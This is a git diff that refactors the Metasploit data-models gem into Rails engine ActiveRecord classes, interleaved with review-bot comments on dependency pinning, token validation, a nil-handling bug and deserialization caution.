+- .../app/models/mdm/report_template.rb | 35 +- .../app/models/mdm/route.rb | 14 +- .../app/models/mdm/service.rb | 82 +- .../app/models/mdm/session.rb | 61 +- .../app/models/mdm/session_event.rb | 13 +- .../app/models/mdm/tag.rb | 59 +- .../app/models/mdm/task.rb | 51 +- .../app/models/mdm/user.rb | 43 +- .../app/models/mdm/vuln.rb | 78 +- .../app/models/mdm/vuln_attempt.rb | 21 +- .../app/models/mdm/vuln_detail.rb | 20 +- .../app/models/mdm/vuln_ref.rb | 19 +- 
.../app/models/mdm/web_form.rb | 21 +- .../app/models/mdm/web_page.rb | 21 +- .../app/models/mdm/web_site.rb | 74 +- .../app/models/mdm/web_vuln.rb | 21 +- .../app/models/mdm/wmap_request.rb | 7 +- .../app/models/mdm/wmap_target.rb | 7 +- .../app/models/mdm/workspace.rb | 331 ++--- .../bin/mdm_console | 4 +- .../metasploit_data_models-0.3.0/lib/mdm.rb | 12 + .../host/operating_system_normalization.rb | 984 ++++++++++++++ .../lib/metasploit_data_models.rb | 95 +- .../lib/metasploit_data_models/engine.rb | 7 + .../lib/metasploit_data_models/version.rb | 6 +- .../metasploit_data_models.gemspec | 11 +- .../metasploit_data_models-0.3.0/script/rails | 8 + .../spec/dummy/Rakefile | 7 + .../app/assets/javascripts/application.js | 15 + .../app/assets/stylesheets/application.css | 13 + .../app/controllers/application_controller.rb | 3 + .../dummy/app/helpers/application_helper.rb | 2 + .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 14 + .../spec/dummy/config.ru | 4 + .../spec/dummy/config/application.rb | 61 + .../spec/dummy/config/boot.rb | 10 + .../spec/dummy/config/database.yml.example | 22 + .../spec/dummy/config/environment.rb | 5 + .../dummy/config/environments/development.rb | 37 + .../dummy/config/environments/production.rb | 67 + .../spec/dummy/config/environments/test.rb | 37 + .../initializers/backtrace_silencers.rb | 7 + .../dummy/config/initializers/inflections.rb | 15 + .../dummy/config/initializers/mime_types.rb | 5 + .../dummy/config/initializers/secret_token.rb | 7 + .../config/initializers/session_store.rb | 8 + .../config/initializers/wrap_parameters.rb | 14 + .../spec/dummy/config/routes.rb | 2 + .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 26 + .../spec/dummy/public/422.html | 26 + .../spec/dummy/public/500.html | 25 + .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 6 + .../spec/spec_helper.rb | 25 +- 
.../metasploit_data_models-0.3.0.gemspec | 12 +- lib/msf/core/db_manager.rb | 2 +- 93 files changed, 2860 insertions(+), 1961 deletions(-) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example create mode 100644 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails
diff --git a/lib/gemcache/ruby/1.9.1/bin/mdm_console b/lib/gemcache/ruby/1.9.1/bin/mdm_console
index 058ee70cb0..7c56696959 100755
--- a/lib/gemcache/ruby/1.9.1/bin/mdm_console
+++ b/lib/gemcache/ruby/1.9.1/bin/mdm_console
@@ -10,13 +10,9 @@ require 'rubygems'
 version = ">= 0"
-if ARGV.first
- str = ARGV.first
- str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
- if str =~ /\A_(.*)_\z/
- version = $1
- ARGV.shift
- end
+if ARGV.first =~ /^_(.*)_$/ and Gem::Version.correct? $1 then
+ version = $1
+ ARGV.shift
 end
 gem 'metasploit_data_models', version
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore
index ce11416a69..e5b2a024e4 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore
@@ -1,6 +1,18 @@
-.rvmrc
-.DS_Store
-*.gem
+# bundler configuration
 .bundle
+# Mac OS X folder attributes
+.DS_Store
+# built gems
+*.gem
+# Rubymine project configuration
+.idea
+# Don't check in rvmrc since this is a gem
+.rvmrc
+# Installed gem versions. Not stored for the same reasons as .rvmrc
 Gemfile.lock
+# Packaging directory for builds
 pkg/*
+# Database configuration (with passwords) for specs
+spec/dummy/config/database.yml
+# logs
+*.log
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile
index 5749f0cec1..b72e01d066 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile
@@ -2,3 +2,9 @@ source "http://rubygems.org" # Specify your gem's dependencies in metasploit_data_models.gemspec gemspec + +group :test do + # rails is only used for testing with a dummy application in spec/dummy + gem 'rails' + gem 'rspec-rails' +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md index 1ab96c8212..0df7b8b712 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md 
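Review bot: The new `:test` group adds `gem 'rails'` and `gem 'rspec-rails'` with no version constraint, and the hunk header shows the file's source is `source "http://rubygems.org"`. The `.gitignore` in this same commit keeps `Gemfile.lock` out of the repository, so every install resolves whatever versions are current, fetched over plain HTTP. I would switch the source to `source "https://rubygems.org"` and give both gems an explicit constraint, e.g. `gem 'rails', '<version constraint>'`, so the test environment is reproducible and gems are not fetched over an unauthenticated channel.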
@@ -17,35 +17,48 @@ __MetasploitDataModels__ exists to do several key things: ### Rails -In a Rails application we simply include the ActiveRecord mixins directly, usually inside models with similar names. +In a Rails application, MetasploitDataModels acts a +[Rails Engine](http://edgeapi.rubyonrails.org/classes/Rails/Engine.html) and the models are available to application +just as if they were defined under app/models. If your Rails appliation needs to modify the models, this can be done +using ActiveSupport.on_load hooks in initializers. The block passed to on_load hook is evaluated in the context of the +model class, so defining method and including modules will work just like reopeninng the class, but +ActiveSupport.on_load ensures that the monkey patches will work after reloading in development mode. Each class has a +different on_load name, which is just the class name converted to an underscored symbol, so Mdm::ApiKey runs the +:mdm_api_key load hooks, etc. -### MSF -When MetasploitDataModels is included by MSF, the gem dynamically creates -ActiveRecord model classes. + # Gemfile + gem :metasploiit_data_models, :git => git://github.com/rapid7/metasploit_data_models.git, :tag => 'v0.3.0' -Both of these behaviors are based on the assumption that the files in -__lib/metasploit_data_models/active_record_models__, though implemented here as -mixins, actually represent the basic ActiveRecord model structure that both Metasploit Framework and Metasploit Pro use. + # config/initializers/metasploit_data_models.rb + ActiveSupport.on_load(:mdm_api_key) do + # Returns the String obfuscated token for display. Meant to avoid CSRF + # api-key stealing attackes. + def obfuscated_token + token[0..3] + "****************************" + end + end + +### Metasploit Framework + +In Metasploit Framework, `MetasploitDataModels.require_models` is called by the `Msf::DbManager` to use the data models +only if the user wants to use the database. 
### Elsewhere -__NOTE: This isn't in RubyGems yet. Using a Gemfile entry pointing to this repo (i.e., using [Bundler](http://gembundler.com)) is the suggested option for now.__ +__NOTE: This isn't in RubyGems yet. Using a Gemfile entry pointing to this repo (i.e., using +[Bundler](http://gembundler.com)) is the suggested option for now.__ +Usage outside of Rapid7 is still alpha, as reflected in the pre-1.0.0 version, and we're not making many promises. That +being said, usage is easy: -Usage outside of Rapid7 is still alpha, and we're not making many promises. That being said, usage is easy: - -```ruby -connection_info = YAML.load_file("path/to/rails-style/db_config_file") -ActiveRecord::Base.establish_connection(connection_info['development']) -include MetasploitDataModels -MetasploitDataModels.create_and_load_ar_classes -``` + connection_info = YAML.load_file("path/to/rails-style/db_config_file") + ActiveRecord::Base.establish_connection(connection_info['development']) + MetasploitDataModels.require_models Basically you need to do the following things: 1. Establish an ActiveRecord connection. A Rails __config/database.yml__ is ideal for this. -2. Include the MetasploitDataModels module. -3. Call the class method that builds the AR models into the Mdm namespace( __MetasploitDataModels.create_and_load_ar_classes__ ). +2. `MetasploitDataModels.require_models` ## Developer Info 
@@ -57,19 +70,3 @@ Give it a path to a working MSF database.yml file for full ActiveRecord-based access to your data. __Note:__ "development" mode is hardcoded into the console currently. - -### ActiveRecord::ConnectionError issues -Because the gem is defining mixins, there can be no knowledge of the -specifics of any "current" ActiveRecord connection. But if ActiveRecord -encounters something in a child class that would require knowledge of -the connection adapter (e.g. the use of an RDBMS-specific function in -a named scope's "WHERE" clause), it will check to see if the adapter -supports it and then throw an exception when the connection object -(which provides the adapter) is nil. - -This means that, for all but the most trivial cases, you need to use Arel -versions of queries instead of ones utilizing straight SQL. - -You'll encounter this sometimes if you do dev work on this gem. A good -rule of thumb: anything that goes into the class_eval block must be able -to work without knowledge of the AR connection adapter type. diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile index 29955274e0..ccea92f08e 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile @@ -1 +1,7 @@ -require "bundler/gem_tasks" +require 'bundler/gem_tasks' +require 'rspec/core/rake_task' + +RSpec::Core::RakeTask.new(:spec) + +task :default => :spec + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb index fbf08daa2c..0422b7a3d9 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb 
@@ -1,22 +1,20 @@ -module MetasploitDataModels::ActiveRecordModels::ApiKey - def self.included(base) - base.class_eval { +class Mdm::ApiKey < ActiveRecord::Base + # + # Validators + # - validate do |key| - lic = License.get + validate :supports_api + validates :token, :presence => true, :length => { :minimum => 8 } - if lic and not lic.supports_api? - key.errors[:unsupported_product] = " - this product does not support API access" - end + protected - if key.token.to_s.empty? - key.errors[:blank_token] = " - the specified authentication token is empty" - end + def supports_api + license = License.get - if key.token.to_s.length < 8 - key.errors[:token_too_short] = " - the specified authentication token must be at least 8 characters long" - end - end - } + if license and not license.supports_api? + errors[:license] = " - this product does not support API access" + end end + + ActiveSupport.run_load_hooks(:mdm_api_key, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb index 2e99613ade..ae0ac1914e 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb @@ -1,8 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::Client - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :campaign, :class_name => "Campaign" - } - end +class Mdm::Client < ActiveRecord::Base + # + # Relations + # + belongs_to :campaign, :class_name => 'Mdm::Campaign' + belongs_to :host, :class_name => 'Mdm::Host' + + ActiveSupport.run_load_hooks(:mdm_client, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb index d71bf8a45e..9c5e01156f 100755 
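Review bot: The `token` validation in `Mdm::ApiKey` accepts any string of eight or more characters and does not check uniqueness, so a short, guessable value passes and two keys can share a token. The hunk covers the whole class and nothing in it generates the token. If callers supply it, consider `validates :token, :presence => true, :length => { :minimum => 8 }, :uniqueness => true` and creating values with `SecureRandom.hex` rather than accepting caller-chosen strings. Separately, `supports_api` adds no error when `License.get` returns nil, so the licence check passes when no licence is found; a comment such as `# a missing license is treated as API-capable` would make clear whether that is intended.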
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb 
@@ -1,78 +1,80 @@ -module MetasploitDataModels::ActiveRecordModels::Cred - def self.included(base) - base.class_eval{ - belongs_to :service, :class_name => "Mdm::Service" +class Mdm::Cred < ActiveRecord::Base + # + # CONSTANTS + # + KEY_ID_REGEX = /([0-9a-fA-F:]{47})/ + PTYPES = { + 'read/write password' => 'password_rw', + 'read-only password' => 'password_ro', + 'SMB hash' => 'smb_hash', + 'SSH private key' => 'ssh_key', + 'SSH public key' => 'ssh_pubkey' + } - unless defined? PTYPES - const_def =<<-CONST_DEF - PTYPES = { - "read/write password" => "password_rw", - "read-only password" => "password_ro", - "SMB hash" => "smb_hash", - "SSH private key" => "ssh_key", - "SSH public key" => "ssh_pubkey" - } - CONST_DEF - eval(const_def) - end + # + # Relations + # + belongs_to :service, :class_name => "Mdm::Service" - eval("KEY_ID_REGEX = /([0-9a-fA-F:]{47})/") unless defined?(KEY_ID_REGEX) # Could be more strict + def ptype_human + humanized = PTYPES.select do |k, v| + v == ptype + end.keys[0] - def ptype_human - humanized = PTYPES.select do |k, v| - v == ptype - end.keys[0] - - humanized ? humanized : ptype - end - - # Returns its workspace - def workspace - self.service.host.workspace - end - - # Returns its key id. If this is not an ssh-type key, returns nil. - def ssh_key_id - return nil unless self.ptype =~ /^ssh_/ - return nil unless self.proof =~ KEY_ID_REGEX - $1.downcase # Can't run into NilClass problems. - end - - # Returns all private keys with matching key ids, including itself - # If this is not an ssh-type key, always returns an empty array. - def ssh_private_keys - return [] unless self.ssh_key_id - matches = self.class.all(:conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_key", "%#{self.ssh_key_id}%"]) - matches.select {|c| c.workspace == self.workspace} - end - - # Returns all public keys with matching key ids, including itself - # If this is not an ssh-type key, always returns an empty array. 
- def ssh_public_keys - return [] unless self.ssh_key_id - matches = self.class.all(:conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_pubkey", "%#{self.ssh_key_id}%"]) - matches.select {|c| c.workspace == self.workspace} - end - - # Returns all keys with matching key ids, including itself - # If this is not an ssh-type key, always returns an empty array. - def ssh_keys - (self.ssh_private_keys | self.ssh_public_keys) - end - - def ssh_key_matches?(other_cred) - return false unless other_cred.kind_of? self.class - return false unless self.ptype == other_cred.ptype - case self.ptype - when "ssh_key" - matches = self.ssh_private_keys - when "ssh_pubkey" - matches = self.ssh_public_keys - else - false - end - matches.include?(self) and matches.include?(other_cred) - end - } + humanized ? humanized : ptype end + + # Returns its key id. If this is not an ssh-type key, returns nil. + def ssh_key_id + return nil unless self.ptype =~ /^ssh_/ + return nil unless self.proof =~ KEY_ID_REGEX + $1.downcase # Can't run into NilClass problems. + end + + def ssh_key_matches?(other_cred) + return false unless other_cred.kind_of? self.class + return false unless self.ptype == other_cred.ptype + case self.ptype + when "ssh_key" + matches = self.ssh_private_keys + when "ssh_pubkey" + matches = self.ssh_public_keys + else + false + end + matches.include?(self) and matches.include?(other_cred) + end + + # Returns all keys with matching key ids, including itself + # If this is not an ssh-type key, always returns an empty array. + def ssh_keys + (self.ssh_private_keys | self.ssh_public_keys) + end + + # Returns all private keys with matching key ids, including itself + # If this is not an ssh-type key, always returns an empty array. + def ssh_private_keys + return [] unless self.ssh_key_id + matches = self.class.all( + :conditions => ["creds.ptype = ? 
AND creds.proof ILIKE ?", "ssh_key", "%#{self.ssh_key_id}%"] + ) + matches.select {|c| c.workspace == self.workspace} + end + + # Returns all public keys with matching key ids, including itself + # If this is not an ssh-type key, always returns an empty array. + def ssh_public_keys + return [] unless self.ssh_key_id + matches = self.class.all( + :conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_pubkey", "%#{self.ssh_key_id}%"] + ) + matches.select {|c| c.workspace == self.workspace} + end + + # Returns its workspace + def workspace + self.service.host.workspace + end + + ActiveSupport.run_load_hooks(:mdm_cred, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb index 5427d8b9c9..f8bc29d84c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb @@ -1,8 +1,8 @@ -module MetasploitDataModels::ActiveRecordModels::CredFile - def self.included(base) - base.class_eval{ +class Mdm::CredFile < ActiveRecord::Base + # + # Relations + # + belongs_to :workspace, :class_name => 'Mdm::Workspace' - belongs_to :workspace, :class_name => "Mdm::Workspace" - } - end + ActiveSupport.run_load_hooks(:mdm_cred_file, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb index 34ab57fcad..e495272312 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb 
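Review bot: In `ssh_key_matches?` the `else` branch of the `case` evaluates `false` without returning it, so for any `ptype` other than `ssh_key` or `ssh_pubkey`, `matches` is still nil and `matches.include?(self)` raises NoMethodError instead of returning false. Change the branch to `else return false`, or assign `matches = []` there. The method was carried over unchanged from the old mixin, so the defect predates this commit, but it is still present on the new side. `ssh_key_id` also tests `ptype` with `/^ssh_/`, which matches at the start of any line; `/\Assh_/` anchors to the start of the string.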
@@ -1,16 +1,30 @@ -module MetasploitDataModels::ActiveRecordModels::Event - def self.included(base) - base.class_eval{ - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :host +class Mdm::Event < ActiveRecord::Base + # + # Relations + # - serialize :info, ::MetasploitDataModels::Base64Serializer.new + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :workspace, :class_name => 'Mdm::Workspace' - scope :flagged, where(:critical => true, :seen => false) - scope :module_run, where(:name => 'module_run') + # + # Scopes + # - validates_presence_of :name - } - end + scope :flagged, where(:critical => true, :seen => false) + scope :module_run, where(:name => 'module_run') + + # + # Serializations + # + + serialize :info, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_event, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb index 99c8a5be9d..edd42d6dfe 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb @@ -1,8 +1,14 @@ -module MetasploitDataModels::ActiveRecordModels::ExploitAttempt - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :exploit_attempt_count - validates :host_id, :presence => true - } - end +class Mdm::ExploitAttempt < ActiveRecord::Base + # + # Relations + # + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :exploit_attempt_count + + # + # Validations + # + + validates :host_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_exploit_attempt, self) end 
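Review bot: `serialize :info, MetasploitDataModels::Base64Serializer.new` in `Mdm::Event` decodes the `info` column's contents whenever an event is loaded, and the serializer's implementation is not part of this hunk. If its load path uses `Marshal.load` or an unrestricted YAML load (an assumption to confirm against the serializer), anyone able to write to the events table can have arbitrary objects instantiated in the process that reads the row. I would add a comment above the line saying so, for example `# info is deserialized on load by Base64Serializer; only trusted code may write this column`, and name the formats the serializer accepts.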
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb index 1b54058fee..8d55119220 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb @@ -1,9 +1,11 @@ -module MetasploitDataModels::ActiveRecordModels::ExploitedHost - def self.included(base) - base.class_eval{ - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :service, :class_name => "Mdm::Service" - belongs_to :workspace, :class_name => "Mdm::Workspace" - } - end +class Mdm::ExploitedHost < ActiveRecord::Base + # + # Relations + # + + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :service, :class_name => 'Mdm::Service' + belongs_to :workspace, :class_name => 'Mdm::Workspace' + + ActiveSupport.run_load_hooks(:mdm_exploited_host, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb index 16b462101e..c31f4c3bb4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb 
@@ -1,1058 +1,134 @@ -module MetasploitDataModels::ActiveRecordModels::Host - def self.included(base) - base.class_eval{ - belongs_to :workspace, :class_name => "Mdm::Workspace" - # hosts_tags are cleaned up in before_destroy: - has_many :hosts_tags, :class_name => "Mdm::HostTag" - has_many :tags, :through => :hosts_tags, :class_name => "Mdm::Tag" - has_many :services, :dependent => :destroy, :class_name => "Mdm::Service", :order => "services.port, services.proto" - has_many :clients, :dependent => :delete_all, :class_name => "Mdm::Client" - has_many :vulns, :dependent => :delete_all, :class_name => "Mdm::Vuln" - has_many :notes, :dependent => :delete_all, :class_name => "Mdm::Note", :order => "notes.created_at" - has_many :loots, :dependent => :destroy, :class_name => "Mdm::Loot", :order => "loots.created_at desc" - has_many :sessions, :dependent => :destroy, :class_name => "Mdm::Session", :order => "sessions.opened_at" - - has_many :service_notes, :through => :services - has_many :web_sites, :through => :services, :class_name => "Mdm::WebSite" - has_many :creds, :through => :services, :class_name => "Mdm::Cred" - has_many :exploited_hosts, :dependent => :destroy, :class_name => "Mdm::ExploitedHost" - - has_many :host_details, :dependent => :destroy, :class_name => "Mdm::HostDetail" - has_many :exploit_attempts, :dependent => :destroy, :class_name => "Mdm::ExploitAttempt" - - validates :address, :presence => true, :ip_format => true - validates_exclusion_of :address, :in => ['127.0.0.1'] - validates_uniqueness_of :address, :scope => :workspace_id, :unless => Proc.new { |host| host.ip_address_invalid? } - - before_destroy :cleanup_tags - - # This is replicated by the IpAddressValidator class. Had to put it here as well to avoid - # SQL errors when checking address uniqueness. - def ip_address_invalid? - begin - potential_ip = IPAddr.new(address) - return true unless potential_ip.ipv4? || potential_ip.ipv6? 
- rescue ArgumentError - return true - end - end - - validates_presence_of :workspace - - scope :alive, where({'hosts.state' => 'alive'}) - scope :search, lambda { |*args| {:conditions => - [ %w{address::text hosts.name os_name os_flavor os_sp mac purpose comments}.map{|c| "#{c} ILIKE ?"}.join(" OR ") ] + [ "%#{args[0]}%" ] * 8 } - } - scope :tag_search, - lambda { |*args| where("tags.name" => args[0]).includes(:tags) } - - scope :flagged, where('notes.critical = true AND notes.seen = false').includes(:notes) - - def is_vm? - !!self.virtual_host - end - - def attribute_locked?(attr) - n = notes.find_by_ntype("host.updated.#{attr}") - n && n.data[:locked] - end - - accepts_nested_attributes_for :services, :reject_if => lambda { |s| s[:port].blank? }, :allow_destroy => true - - def cleanup_tags - # No need to keep tags with no hosts - tags.each do |tag| - tag.destroy if tag.hosts == [self] - end - # Clean up association table records - Mdm::HostTag.delete_all("host_id = #{self.id}") - end - - # Determine if the fingerprint data is readable. If not, it nearly always - # means that there was a problem with the YAML or the Marshal'ed data, - # so let's log that for later investigation. - def validate_fingerprint_data(fp) - if fp.data.kind_of?(Hash) and !fp.data.empty? - return true - elsif fp.ntype == "postgresql.fingerprint" - # Special case postgresql.fingerprint; it's always a string, - # and should not be used for OS fingerprinting (yet), so - # don't bother logging it. TODO: fix os fingerprint finding, this - # name collision seems silly. - return false - else - dlog("Could not validate fingerprint data: #{fp.inspect}") - return false - end - end - - # - # Normalize the operating system fingerprints provided by various scanners - # (nmap, nexpose, retina, nessus, etc). - # - # These are stored as notes (instead of directly in the os_* fields) - # specifically for this purpose. 
